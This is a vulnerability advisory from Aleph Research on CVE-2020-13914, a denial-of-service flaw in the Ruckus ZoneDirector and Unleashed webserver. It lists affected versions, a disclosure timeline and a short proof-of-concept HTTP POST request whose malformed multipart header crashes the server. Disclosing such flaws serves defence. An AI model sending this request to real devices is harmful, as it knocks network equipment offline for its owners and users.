Webserver denial fo service

Aleph Research Advisory

Identifier

CVE-2020-13914

Severity

Moderate

Product

- ZoneDirector - Unleashed

Vulnerable Version

- ZoneDirector: 9.9 and before - ZoneDirector: 9.10.x - ZoneDirector: 9.12.x - ZoneDirector: 9.13.x - ZoneDirector: 10.0.x - ZoneDirector: 10.1.x - ZoneDirector: 10.2.x - ZoneDirector: 10.3.x - Unleashed: 200.6 and before - Unleashed: 200.7

Technical Details

webs in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to cause a denial of service (Segmentation fault) to the webserver via an unauthenticated crafted HTTP request.

Information about the exploitation of this vulnerability can alos be found in our DEFCON 28 talk.

Proof Of Concept

POST / HTTP/1.1
Content-Type: multipart/from-data; boundary=abc
Content-Length: 68

--abc
Content-Disposition:; name="text123"

text default
--abc--

Timeline

05-Feb-20
: Reported to Ruckus Product Security Team
15-Jun-20
: Patch
07-Jun-20
: CVE-2020-13914 assigned
05-Aug-20
: Public disclosure

Credit

waveburst of Aleph Research, HCL Software